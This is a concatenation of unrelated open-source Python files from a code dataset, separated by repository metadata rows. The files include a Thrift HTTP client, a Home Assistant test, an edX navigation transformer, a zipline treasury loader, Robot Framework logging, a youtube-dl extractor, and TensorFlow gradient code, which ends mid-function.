# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from TTransport import *
from cStringIO import StringIO
import urlparse
import httplib
import warnings
class THttpClient(TTransportBase):
"""Http implementation of TTransport base."""
def __init__(self, uri_or_host, port=None, path=None):
"""THttpClient supports two different types constructor parameters.
THttpClient(host, port, path) - deprecated
THttpClient(uri)
Only the second supports https."""
if port is not None:
warnings.warn("Please use the THttpClient('http://host:port/path') syntax", DeprecationWarning, stacklevel=2)
self.host = uri_or_host
self.port = port
assert path
self.path = path
self.scheme = 'http'
else:
parsed = urlparse.urlparse(uri_or_host)
self.scheme = parsed.scheme
assert self.scheme in ('http', 'https')
if self.scheme == 'http':
self.port = parsed.port or httplib.HTTP_PORT
elif self.scheme == 'https':
self.port = parsed.port or httplib.HTTPS_PORT
self.host = parsed.hostname
self.path = parsed.path
self.__wbuf = StringIO()
self.__http = None
def open(self):
if self.scheme == 'http':
self.__http = httplib.HTTP(self.host, self.port)
else:
self.__http = httplib.HTTPS(self.host, self.port)
def close(self):
self.__http.close()
self.__http = None
def isOpen(self):
return self.__http != None
def read(self, sz):
return self.__http.file.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def flush(self):
if self.isOpen():
self.close()
self.open();
# Pull data out of buffer
data = self.__wbuf.getvalue()
self.__wbuf = StringIO()
# HTTP request
self.__http.putrequest('POST', self.path)
# Write headers
self.__http.putheader('Host', self.host)
self.__http.putheader('Content-Type', 'application/x-thrift')
self.__http.putheader('Content-Length', str(len(data)))
self.__http.endheaders()
# Write payload
self.__http.send(data)
# Get reply to flush the request
self.code, self.message, self.headers = self.__http.getreply()
| apache-2.0 | 8,663,821,783,919,870,000 | 28.16 | 115 | 0.674897 | false |
eagleamon/home-assistant | tests/components/sensor/test_random.py | 17 | 1067 | """The test for the random number sensor platform."""
import unittest
from homeassistant.bootstrap import setup_component
from tests.common import get_test_home_assistant
class TestRandomSensor(unittest.TestCase):
"""Test the Random number sensor."""
def setup_method(self, method):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Stop everything that was started."""
self.hass.stop()
def test_random_sensor(self):
"""Test the Randowm number sensor."""
config = {
'sensor': {
'platform': 'random',
'name': 'test',
'minimum': 10,
'maximum': 20,
}
}
assert setup_component(self.hass, 'sensor', config)
state = self.hass.states.get('sensor.test')
self.assertLessEqual(int(state.state), config['sensor']['maximum'])
self.assertGreaterEqual(int(state.state), config['sensor']['minimum'])
| apache-2.0 | -48,266,713,751,136,370 | 28.638889 | 78 | 0.596064 | false |
analyseuc3m/ANALYSE-v1 | lms/djangoapps/course_api/blocks/transformers/navigation.py | 35 | 3103 | """
TODO
"""
from openedx.core.lib.block_structure.transformer import BlockStructureTransformer
from .block_depth import BlockDepthTransformer
class DescendantList(object):
"""
Contain
"""
def __init__(self):
self.items = []
class BlockNavigationTransformer(BlockStructureTransformer):
"""
Creates a table of contents for the course.
Prerequisites: BlockDepthTransformer must be run before this in the
transform phase.
"""
VERSION = 1
BLOCK_NAVIGATION = 'block_nav'
BLOCK_NAVIGATION_FOR_CHILDREN = 'children_block_nav'
def __init__(self, nav_depth):
self.nav_depth = nav_depth
@classmethod
def name(cls):
return "blocks_api:block_navigation"
@classmethod
def collect(cls, block_structure):
"""
Collects any information that's necessary to execute this transformer's
transform method.
"""
# collect basic xblock fields
block_structure.request_xblock_fields('hide_from_toc')
def transform(self, usage_info, block_structure):
"""
Mutates block_structure based on the given usage_info.
"""
if self.nav_depth is None:
return
for block_key in block_structure.topological_traversal():
parents = block_structure.get_parents(block_key)
parents_descendants_list = set()
for parent_key in parents:
parent_nav = block_structure.get_transformer_block_field(
parent_key,
self,
self.BLOCK_NAVIGATION_FOR_CHILDREN,
)
if parent_nav is not None:
parents_descendants_list |= parent_nav
children_descendants_list = None
if (
not block_structure.get_xblock_field(block_key, 'hide_from_toc', False) and (
not parents or
any(parent_desc_list is not None for parent_desc_list in parents_descendants_list)
)
):
# add self to parent's descendants
for parent_desc_list in parents_descendants_list:
if parent_desc_list is not None:
parent_desc_list.items.append(unicode(block_key))
if BlockDepthTransformer.get_block_depth(block_structure, block_key) > self.nav_depth:
children_descendants_list = parents_descendants_list
else:
block_nav_list = DescendantList()
children_descendants_list = {block_nav_list}
block_structure.set_transformer_block_field(
block_key,
self,
self.BLOCK_NAVIGATION,
block_nav_list.items
)
block_structure.set_transformer_block_field(
block_key,
self,
self.BLOCK_NAVIGATION_FOR_CHILDREN,
children_descendants_list
)
| agpl-3.0 | -1,662,347,706,085,102,600 | 32.728261 | 106 | 0.557525 | false |
DVegaCapital/zipline | zipline/data/treasuries_can.py | 32 | 4188 | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import requests
from . loader_utils import (
source_to_records
)
from zipline.data.treasuries import (
treasury_mappings, get_treasury_date, get_treasury_rate
)
_CURVE_MAPPINGS = {
'date': (get_treasury_date, "Date"),
'1month': (get_treasury_rate, "V39063"),
'3month': (get_treasury_rate, "V39065"),
'6month': (get_treasury_rate, "V39066"),
'1year': (get_treasury_rate, "V39067"),
'2year': (get_treasury_rate, "V39051"),
'3year': (get_treasury_rate, "V39052"),
'5year': (get_treasury_rate, "V39053"),
'7year': (get_treasury_rate, "V39054"),
'10year': (get_treasury_rate, "V39055"),
# Bank of Canada refers to this as 'Long' Rate, approximately 30 years.
'30year': (get_treasury_rate, "V39056"),
}
BILLS = ['V39063', 'V39065', 'V39066', 'V39067']
BONDS = ['V39051', 'V39052', 'V39053', 'V39054', 'V39055', 'V39056']
def get_treasury_source(start_date=None, end_date=None):
today = datetime.date.today()
# Bank of Canada only has 10 years of data and has this in the URL.
restriction = datetime.date(today.year - 10, today.month, today.day)
if not end_date:
end_date = today
if not start_date:
start_date = restriction
bill_url = (
"http://www.bankofcanada.ca/stats/results/csv?"
"lP=lookup_tbill_yields.php&sR={restrict}&se="
"L_V39063-L_V39065-L_V39066-L_V39067&dF={start}&dT={end}"
.format(restrict=restriction.strftime("%Y-%m-%d"),
start=start_date.strftime("%Y-%m-%d"),
end=end_date.strftime("%Y-%m-%d"),
)
)
bond_url = (
"http://www.bankofcanada.ca/stats/results/csv?"
"lP=lookup_bond_yields.php&sR={restrict}&se="
"L_V39051-L_V39052-L_V39053-L_V39054-L_V39055-L_V39056"
"&dF={start}&dT={end}"
.format(restrict=restriction.strftime("%Y-%m-%d"),
start=start_date.strftime("%Y-%m-%d"),
end=end_date.strftime("%Y-%m-%d")
)
)
res_bill = requests.get(bill_url, stream=True)
res_bond = requests.get(bond_url, stream=True)
bill_iter = res_bill.iter_lines()
bond_iter = res_bond.iter_lines()
bill_row = ""
while ",".join(BILLS) not in bill_row:
bill_row = bill_iter.next()
if 'Daily series:' in bill_row:
bill_end_date = datetime.datetime.strptime(
bill_row.split(' - ')[1].strip(),
"%Y-%m-%d").date()
bill_header = bill_row.split(",")
bond_row = ""
while ",".join(BONDS) not in bond_row:
bond_row = bond_iter.next()
if 'Daily series:' in bond_row:
bond_end_date = datetime.datetime.strptime(
bond_row.split(' - ')[1].strip(),
"%Y-%m-%d").date()
bond_header = bond_row.split(",")
# Line up the two dates
if bill_end_date > bond_end_date:
bill_iter.next()
elif bond_end_date > bill_end_date:
bond_iter.next()
for bill_row in bill_iter:
bond_row = bond_iter.next()
bill_dict = dict(zip(bill_header, bill_row.split(",")))
bond_dict = dict(zip(bond_header, bond_row.split(",")))
if ' Bank holiday' in bond_row.split(",") + bill_row.split(","):
continue
if ' Not available' in bond_row.split(",") + bill_row.split(","):
continue
bill_dict.update(bond_dict)
yield bill_dict
def get_treasury_data():
mappings = treasury_mappings(_CURVE_MAPPINGS)
source = get_treasury_source()
return source_to_records(mappings, source)
| apache-2.0 | 3,969,860,073,118,303,700 | 32.504 | 75 | 0.602197 | false |
snyderr/robotframework | src/robot/output/librarylogger.py | 3 | 2191 | # Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of the public test library logging API.
This is exposed via :py:mod:`robot.api.logger`. Implementation must reside
here to avoid cyclic imports.
"""
import sys
import threading
from robot.errors import DataError
from robot.utils import unic, console_encode
from .logger import LOGGER
from .loggerhelper import Message
LOGGING_THREADS = ('MainThread', 'RobotFrameworkTimeoutThread')
def write(msg, level, html=False):
# Callable messages allow lazy logging internally, but we don't want to
# expose this functionality publicly. See the following issue for details:
# https://github.com/robotframework/robotframework/issues/1505
if callable(msg):
msg = unic(msg)
if level.upper() not in ('TRACE', 'DEBUG', 'INFO', 'HTML', 'WARN', 'ERROR'):
raise DataError("Invalid log level '%s'." % level)
if threading.currentThread().getName() in LOGGING_THREADS:
LOGGER.log_message(Message(msg, level, html))
def trace(msg, html=False):
write(msg, 'TRACE', html)
def debug(msg, html=False):
write(msg, 'DEBUG', html)
def info(msg, html=False, also_console=False):
write(msg, 'INFO', html)
if also_console:
console(msg)
def warn(msg, html=False):
write(msg, 'WARN', html)
def error(msg, html=False):
write(msg, 'ERROR', html)
def console(msg, newline=True, stream='stdout'):
msg = unic(msg)
if newline:
msg += '\n'
stream = sys.__stdout__ if stream.lower() != 'stderr' else sys.__stderr__
stream.write(console_encode(msg, stream=stream))
stream.flush()
| apache-2.0 | 3,880,569,546,245,713,000 | 28.608108 | 80 | 0.700593 | false |
Edu-Glez/Bank_sentiment_analysis | env/lib/python3.6/site-packages/zmq/eventloop/minitornado/platform/auto.py | 50 | 1424 | #!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of platform-specific functionality.
For each function or class described in `tornado.platform.interface`,
the appropriate platform-specific implementation exists in this module.
Most code that needs access to this functionality should do e.g.::
from tornado.platform.auto import set_close_exec
"""
from __future__ import absolute_import, division, print_function, with_statement
import os
if os.name == 'nt':
from .common import Waker
from .windows import set_close_exec
else:
from .posix import set_close_exec, Waker
try:
# monotime monkey-patches the time module to have a monotonic function
# in versions of python before 3.3.
import monotime
except ImportError:
pass
try:
from time import monotonic as monotonic_time
except ImportError:
monotonic_time = None
| apache-2.0 | -4,155,557,865,301,299,000 | 30.644444 | 80 | 0.754213 | false |
candrews/portage | pym/portage/dbapi/_SyncfsProcess.py | 8 | 1169 | # Copyright 2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from portage import os
from portage.util._ctypes import find_library, LoadLibrary
from portage.util._async.ForkProcess import ForkProcess
class SyncfsProcess(ForkProcess):
"""
Isolate ctypes usage in a subprocess, in order to avoid
potential problems with stale cached libraries as
described in bug #448858, comment #14 (also see
http://bugs.python.org/issue14597).
"""
__slots__ = ('paths',)
@staticmethod
def _get_syncfs():
filename = find_library("c")
if filename is not None:
library = LoadLibrary(filename)
if library is not None:
try:
return library.syncfs
except AttributeError:
pass
return None
def _run(self):
syncfs_failed = False
syncfs = self._get_syncfs()
if syncfs is not None:
for path in self.paths:
try:
fd = os.open(path, os.O_RDONLY)
except OSError:
pass
else:
try:
if syncfs(fd) != 0:
# Happens with PyPy (bug #446610)
syncfs_failed = True
finally:
os.close(fd)
if syncfs is None or syncfs_failed:
return 1
return os.EX_OK
| gpl-2.0 | -2,537,455,299,542,058,000 | 21.056604 | 66 | 0.680068 | false |
MiLk/youtube-dl | youtube_dl/extractor/wimp.py | 13 | 1787 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from .youtube import YoutubeIE
class WimpIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?wimp\.com/([^/]+)/'
_TESTS = [{
'url': 'http://www.wimp.com/maruexhausted/',
'md5': 'f1acced123ecb28d9bb79f2479f2b6a1',
'info_dict': {
'id': 'maruexhausted',
'ext': 'flv',
'title': 'Maru is exhausted.',
'description': 'md5:57e099e857c0a4ea312542b684a869b8',
}
}, {
# youtube video
'url': 'http://www.wimp.com/clowncar/',
'info_dict': {
'id': 'cG4CEr2aiSg',
'ext': 'mp4',
'title': 'Basset hound clown car...incredible!',
'description': 'md5:8d228485e0719898c017203f900b3a35',
'uploader': 'Gretchen Hoey',
'uploader_id': 'gretchenandjeff1',
'upload_date': '20140303',
},
'add_ie': ['Youtube'],
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group(1)
webpage = self._download_webpage(url, video_id)
video_url = self._search_regex(
r's1\.addVariable\("file",\s*"([^"]+)"\);', webpage, 'video URL')
if YoutubeIE.suitable(video_url):
self.to_screen('Found YouTube video')
return {
'_type': 'url',
'url': video_url,
'ie_key': YoutubeIE.ie_key(),
}
return {
'id': video_id,
'url': video_url,
'title': self._og_search_title(webpage),
'thumbnail': self._og_search_thumbnail(webpage),
'description': self._og_search_description(webpage),
}
| unlicense | -3,861,804,675,147,954,700 | 31.490909 | 77 | 0.512031 | false |
benoitsteiner/tensorflow | tensorflow/python/ops/math_grad.py | 5 | 33823 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in math_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
def _safe_shape_div(x, y):
"""Divides `x / y` assuming `x, y >= 0`, treating `0 / 0 = 0`."""
return x // math_ops.maximum(y, 1)
@ops.RegisterGradient("Sum")
def _SumGrad(op, grad):
"""Gradient for Sum."""
# Fast path for when reducing to a scalar and ndims is known: adds only
# Reshape and Tile ops (and possibly a Shape).
if (op.inputs[0].get_shape().ndims is not None and
op.inputs[1].op.type == "Const"):
rank = op.inputs[0].get_shape().ndims
axes = tensor_util.MakeNdarray(op.inputs[1].op.get_attr("value"))
if np.array_equal(axes, np.arange(rank)): # Reduce all dims.
grad = array_ops.reshape(grad, [1] * rank)
# If shape is not fully defined (but rank is), we use Shape.
if op.inputs[0].get_shape().is_fully_defined():
input_shape = op.inputs[0].get_shape().as_list()
else:
input_shape = array_ops.shape(op.inputs[0])
return [array_ops.tile(grad, input_shape), None]
input_shape = array_ops.shape(op.inputs[0])
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
tile_scaling = _safe_shape_div(input_shape, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
return [array_ops.tile(grad, tile_scaling), None]
def _MinOrMaxGrad(op, grad):
"""Gradient for Min or Max. Amazingly it's precisely the same code."""
input_shape = array_ops.shape(op.inputs[0])
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
y = op.outputs[0]
y = array_ops.reshape(y, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
# Compute the number of selected (maximum or minimum) elements in each
# reduction dimension. If there are multiple minimum or maximum elements
# then the gradient will be divided between them.
indicators = math_ops.cast(math_ops.equal(y, op.inputs[0]), grad.dtype)
num_selected = array_ops.reshape(
math_ops.reduce_sum(indicators, op.inputs[1]), output_shape_kept_dims)
return [math_ops.div(indicators, num_selected) * grad, None]
@ops.RegisterGradient("Max")
def _MaxGrad(op, grad):
"""Gradient for Max."""
return _MinOrMaxGrad(op, grad)
@ops.RegisterGradient("Min")
def _MinGrad(op, grad):
return _MinOrMaxGrad(op, grad)
@ops.RegisterGradient("Mean")
def _MeanGrad(op, grad):
"""Gradient for Mean."""
sum_grad = _SumGrad(op, grad)[0]
input_shape = array_ops.shape(op.inputs[0])
output_shape = array_ops.shape(op.outputs[0])
factor = _safe_shape_div(
math_ops.reduce_prod(input_shape), math_ops.reduce_prod(output_shape))
return sum_grad / math_ops.cast(factor, sum_grad.dtype), None
@ops.RegisterGradient("Prod")
def _ProdGrad(op, grad):
"""Gradient for Prod."""
# The gradient can be expressed by dividing the product by each entry of the
# input tensor, but this approach can't deal with zeros in the input.
# Here, we avoid this problem by composing the output as a product of two
# cumprod operations.
input_shape = array_ops.shape(op.inputs[0])
# Reshape reduction indices for the case where the parameter is a scalar
reduction_indices = array_ops.reshape(op.inputs[1], [-1])
# Expand grad to full input shape
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
tile_scaling = _safe_shape_div(input_shape, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
grad = array_ops.tile(grad, tile_scaling)
# Pack all reduced dimensions into a single one, so we can perform the
# cumprod ops. If the reduction dims list is empty, it defaults to float32,
# so we need to cast here. We put all the shape-related ops on CPU to avoid
# copying back and forth, and since listdiff is CPU only.
with ops.device("/cpu:0"):
reduced = math_ops.cast(reduction_indices, dtypes.int32)
idx = math_ops.range(0, array_ops.rank(op.inputs[0]))
other, _ = array_ops.setdiff1d(idx, reduced)
perm = array_ops.concat([reduced, other], 0)
reduced_num = math_ops.reduce_prod(array_ops.gather(input_shape, reduced))
other_num = math_ops.reduce_prod(array_ops.gather(input_shape, other))
permuted = array_ops.transpose(op.inputs[0], perm)
permuted_shape = array_ops.shape(permuted)
reshaped = array_ops.reshape(permuted, (reduced_num, other_num))
# Calculate product, leaving out the current entry
left = math_ops.cumprod(reshaped, axis=0, exclusive=True)
right = math_ops.cumprod(reshaped, axis=0, exclusive=True, reverse=True)
y = array_ops.reshape(left * right, permuted_shape)
# Invert the transpose and reshape operations.
# Make sure to set the statically known shape information through a reshape.
out = grad * array_ops.transpose(y, array_ops.invert_permutation(perm))
return array_ops.reshape(out, input_shape), None
@ops.RegisterGradient("SegmentSum")
def _SegmentSumGrad(op, grad):
"""Gradient for SegmentSum."""
return array_ops.gather(grad, op.inputs[1]), None
@ops.RegisterGradient("SegmentMean")
def _SegmentMeanGrad(op, grad):
"""Gradient for SegmentMean."""
input_rank = array_ops.rank(op.inputs[0])
ones_shape = array_ops.concat([
array_ops.shape(op.inputs[1]),
array_ops.fill(array_ops.expand_dims(input_rank - 1, 0), 1)
], 0)
ones = array_ops.fill(ones_shape,
constant_op.constant(1, dtype=grad.dtype))
scaled_grad = math_ops.div(grad, math_ops.segment_sum(ones, op.inputs[1]))
return array_ops.gather(scaled_grad, op.inputs[1]), None
@ops.RegisterGradient("SparseSegmentSum")
def _SparseSegmentSumGrad(op, grad):
"""Gradient for SparseSegmentSum."""
input_rows = array_ops.shape(op.inputs[0])[0]
return (math_ops.unsorted_segment_sum(
array_ops.gather(grad, op.inputs[2]), op.inputs[1], input_rows), None,
None)
@ops.RegisterGradient("SparseSegmentMean")
def _SparseSegmentMeanGrad(op, grad):
"""Gradient for SparseSegmentMean."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_mean_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None)
@ops.RegisterGradient("SparseSegmentSqrtN")
def _SparseSegmentSqrtNGrad(op, grad):
"""Gradient for SparseSegmentSqrtN."""
dim0 = array_ops.shape(op.inputs[0])[0]
return (math_ops.sparse_segment_sqrt_n_grad(grad, op.inputs[1], op.inputs[2],
dim0), None, None)
def _SegmentMinOrMaxGrad(op, grad, is_sorted):
"""Gradient for SegmentMin and (unsorted) SegmentMax. They share similar code."""
zeros = array_ops.zeros(array_ops.shape(op.inputs[0]),
dtype=op.inputs[0].dtype)
# Get the number of selected (minimum or maximum) elements in each segment.
gathered_outputs = array_ops.gather(op.outputs[0], op.inputs[1])
is_selected = math_ops.equal(op.inputs[0], gathered_outputs)
if is_sorted:
num_selected = math_ops.segment_sum(math_ops.cast(is_selected, grad.dtype),
op.inputs[1])
else:
num_selected = math_ops.unsorted_segment_sum(math_ops.cast(is_selected, grad.dtype),
op.inputs[1], op.inputs[2])
# Compute the gradient for each segment. The gradient for the ith segment is
# divided evenly among the selected elements in that segment.
weighted_grads = math_ops.div(grad, num_selected)
gathered_grads = array_ops.gather(weighted_grads, op.inputs[1])
if is_sorted:
return array_ops.where(is_selected, gathered_grads, zeros), None
else:
return array_ops.where(is_selected, gathered_grads, zeros), None, None
@ops.RegisterGradient("SegmentMin")
def _SegmentMinGrad(op, grad):
"""Gradient for SegmentMin."""
return _SegmentMinOrMaxGrad(op, grad, True)
@ops.RegisterGradient("SegmentMax")
def _SegmentMaxGrad(op, grad):
"""Gradient for SegmentMax."""
return _SegmentMinOrMaxGrad(op, grad, True)
@ops.RegisterGradient("UnsortedSegmentSum")
def _UnsortedSegmentSumGrad(op, grad):
"""Gradient for SegmentSum."""
return array_ops.gather(grad, op.inputs[1]), None, None
@ops.RegisterGradient("UnsortedSegmentMax")
def _UnsortedSegmentMaxGrad(op, grad):
return _SegmentMinOrMaxGrad(op, grad, False)
@ops.RegisterGradient("Abs")
def _AbsGrad(op, grad):
x = op.inputs[0]
return grad * math_ops.sign(x)
@ops.RegisterGradient("Neg")
def _NegGrad(_, grad):
"""Returns -grad."""
return -grad
@ops.RegisterGradient("Inv")
def _InvGrad(op, grad):
"""Returns -grad * (1 / x^2)."""
y = op.outputs[0] # y = 1 / x
# pylint: disable=protected-access
return gen_math_ops._reciprocal_grad(y, grad)
@ops.RegisterGradient("Reciprocal")
def _ReciprocalGrad(op, grad):
"""Returns -grad * (1 / x^2)."""
y = op.outputs[0] # y = 1 / x
# pylint: disable=protected-access
return gen_math_ops._reciprocal_grad(y, grad)
@ops.RegisterGradient("InvGrad")
def _InvGradGrad(op, grad):
b = op.inputs[1]
# op.output[0]: y = -b * conj(a)^2
with ops.control_dependencies([grad.op]):
ca = math_ops.conj(op.inputs[0])
cg = math_ops.conj(grad)
# pylint: disable=protected-access
return cg * -2.0 * b * ca, gen_math_ops._reciprocal_grad(ca, grad)
@ops.RegisterGradient("ReciprocalGrad")
def _ReciprocalGradGrad(op, grad):
b = op.inputs[1]
# op.output[0]: y = -b * conj(a)^2
with ops.control_dependencies([grad.op]):
ca = math_ops.conj(op.inputs[0])
cg = math_ops.conj(grad)
# pylint: disable=protected-access
return cg * -2.0 * b * ca, gen_math_ops._reciprocal_grad(ca, grad)
@ops.RegisterGradient("Square")
def _SquareGrad(op, grad):
x = op.inputs[0]
# Added control dependencies to prevent 2*x from being computed too early.
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * (2.0 * x)
@ops.RegisterGradient("Sqrt")
def _SqrtGrad(op, grad):
y = op.outputs[0] # y = x^(1/2)
return gen_math_ops._sqrt_grad(y, grad)
@ops.RegisterGradient("SqrtGrad")
def _SqrtGradGrad(op, grad):
a = op.inputs[0]
y = op.outputs[0] # y = 0.5 * b / conj(a)
with ops.control_dependencies([grad.op]):
ga = grad / a
return -math_ops.conj(ga) * y, 0.5 * ga
@ops.RegisterGradient("Rsqrt")
def _RsqrtGrad(op, grad):
"""Returns -0.5 * grad * conj(y)^3."""
y = op.outputs[0] # y = x^(-1/2)
return gen_math_ops._rsqrt_grad(y, grad)
@ops.RegisterGradient("RsqrtGrad")
def _RsqrtGradGrad(op, grad):
"""Returns backprop gradient for f(a,b) = -0.5 * b * conj(a)^3."""
a = op.inputs[0] # a = x^{-1/2}
b = op.inputs[1] # backprop gradient for a
with ops.control_dependencies([grad.op]):
ca = math_ops.conj(a)
cg = math_ops.conj(grad)
grad_a = -1.5 * cg * b * math_ops.square(ca)
# pylint: disable=protected-access
grad_b = gen_math_ops._rsqrt_grad(ca, grad)
return grad_a, grad_b
@ops.RegisterGradient("Exp")
def _ExpGrad(op, grad):
"""Returns grad * exp(x)."""
y = op.outputs[0] # y = e^x
with ops.control_dependencies([grad.op]):
y = math_ops.conj(y)
return grad * y
@ops.RegisterGradient("Expm1")
def _Expm1Grad(op, grad):
"""Returns grad * exp(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
y = math_ops.exp(x)
return grad * y
@ops.RegisterGradient("Log")
def _LogGrad(op, grad):
"""Returns grad * (1/x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.reciprocal(x)
@ops.RegisterGradient("Log1p")
def _Log1pGrad(op, grad):
"""Returns grad * (1/(1 + x))."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.reciprocal(1 + x)
@ops.RegisterGradient("Sinh")
def _SinhGrad(op, grad):
"""Returns grad * cosh(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.cosh(x)
@ops.RegisterGradient("Cosh")
def _CoshGrad(op, grad):
"""Returns grad * sinh(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.sinh(x)
@ops.RegisterGradient("Tanh")
def _TanhGrad(op, grad):
"""Returns grad * (1 - tanh(x) * tanh(x))."""
y = op.outputs[0] # y = tanh(x)
with ops.control_dependencies([grad.op]):
y = math_ops.conj(y)
# pylint: disable=protected-access
return gen_math_ops._tanh_grad(y, grad)
@ops.RegisterGradient("TanhGrad")
def _TanhGradGrad(op, grad):
with ops.control_dependencies([grad.op]):
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
# pylint: disable=protected-access
return grad * -2.0 * b * a, gen_math_ops._tanh_grad(a, grad)
@ops.RegisterGradient("Erf")
def _ErfGrad(op, grad):
"""Returns grad * 2/sqrt(pi) * exp(-x**2)."""
x = op.inputs[0]
two_over_root_pi = constant_op.constant(2 / np.sqrt(np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * two_over_root_pi * math_ops.exp(-math_ops.square(x))
@ops.RegisterGradient("Erfc")
def _ErfcGrad(op, grad):
"""Returns -grad * 2/sqrt(pi) * exp(-x**2)."""
x = op.inputs[0]
minus_two_over_root_pi = constant_op.constant(
-2 / np.sqrt(np.pi), dtype=grad.dtype)
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * minus_two_over_root_pi * math_ops.exp(-math_ops.square(x))
@ops.RegisterGradient("Lgamma")
def _LgammaGrad(op, grad):
"""Returns grad * digamma(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.digamma(x)
@ops.RegisterGradient("Digamma")
def _DigammaGrad(op, grad):
"""Compute gradient of the digamma function with respect to its argument."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.polygamma(array_ops.constant(1, dtype=x.dtype), x)
@ops.RegisterGradient("Igamma")
def _IgammaGrad(op, grad):
"""Returns gradient of igamma(a, x) with respect to x."""
# TODO(ebrevdo): Perhaps add the derivative w.r.t. a
a = op.inputs[0]
x = op.inputs[1]
sa = array_ops.shape(a)
sx = array_ops.shape(x)
unused_ra, rx = gen_array_ops._broadcast_gradient_args(sa, sx)
# Perform operations in log space before summing, because Gamma(a)
# and Gamma'(a) can grow large.
partial_x = math_ops.exp(-x + (a - 1) * math_ops.log(x) - math_ops.lgamma(a))
# TODO(b/36815900): Mark None return values as NotImplemented
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Igammac")
def _IgammacGrad(op, grad):
"""Returns gradient of igammac(a, x) = 1 - igamma(a, x) w.r.t. x."""
_, igamma_grad_x = _IgammaGrad(op, grad)
return None, -igamma_grad_x
@ops.RegisterGradient("Betainc")
def _BetaincGrad(op, grad):
"""Returns gradient of betainc(a, b, x) with respect to x."""
# TODO(ebrevdo): Perhaps add the derivative w.r.t. a, b
a, b, x = op.inputs
# two cases: x is a scalar and a/b are same-shaped tensors, or vice
# versa; so its sufficient to check against shape(a).
sa = array_ops.shape(a)
sx = array_ops.shape(x)
# pylint: disable=protected-access
_, rx = gen_array_ops._broadcast_gradient_args(sa, sx)
# pylint: enable=protected-access
# Perform operations in log space before summing, because terms
# can grow large.
log_beta = (gen_math_ops.lgamma(a) + gen_math_ops.lgamma(b)
- gen_math_ops.lgamma(a + b))
partial_x = math_ops.exp(
(b - 1) * math_ops.log(1 - x) + (a - 1) * math_ops.log(x) - log_beta)
# TODO(b/36815900): Mark None return values as NotImplemented
return (None, # da
None, # db
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Zeta")
def _ZetaGrad(op, grad):
"""Returns gradient of zeta(x, q) with respect to x and q."""
# TODO(tillahoffmann): Add derivative with respect to x
